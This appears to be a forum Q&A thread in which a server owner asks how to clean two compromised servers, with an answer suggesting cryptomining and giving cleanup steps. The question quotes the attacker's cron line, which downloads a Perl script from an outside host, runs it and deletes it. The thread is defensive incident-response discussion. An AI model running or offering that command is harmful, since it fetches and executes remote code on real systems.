Can I clean these two hacked servers withour reinstalling?

Question

I've got two dedicated servers that some days ago started to send me notifications about unknown cron jobs running.

On both servers I've got secondary accounts for my websites and the hacker has modified the cron job for those accounts, not for root. So I think "maybe" they have only got limited access.

Both are trying to run the following: cd /tmp;wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt;rm -f abc*

Cronjob output from first server:
http://pastebin.com/m56ga6pp

Cronjob output from second server:
http://pastebin.com/4utZ8agC

The weird thing is that both servers seem hacked at the same time and by using the same method.

Did anyone had exactly this kind of hack that can give me ideas on how did he got in and if I can remove it without reinstalling..?

There are plenty of websites on the servers, and the first one uses about 500GB that would take a lot to move somewhere else and reinstall.

Thanks in advance!

score 1 · Answer 1 · answered May 15 '14 at 23:14

From looking at the pastebin output it appears the cron jobs are trying to generate hashes I would suspect the person is trying to use the server as part of a mining pool for a crypto currency.

For details on how he got in we would need various logs and are you 100% sure its not the website owner who did it? You can easily remove the cronjob with.
crontab -e

For preventing the person from getting back in I would disable shell access for the specific user if there is no reason for them to have it.
chsh -s /sbin/nologin {username}

Thanks for the reply, I am the only owner of the server, and the shell access it is used for updating that website with svn and to configure some tasks as cron jobs. — Alexandru Trandafir Catalin, May 16 '14 at 12:47

Can I clean these two hacked servers withour reinstalling?

1 Answers1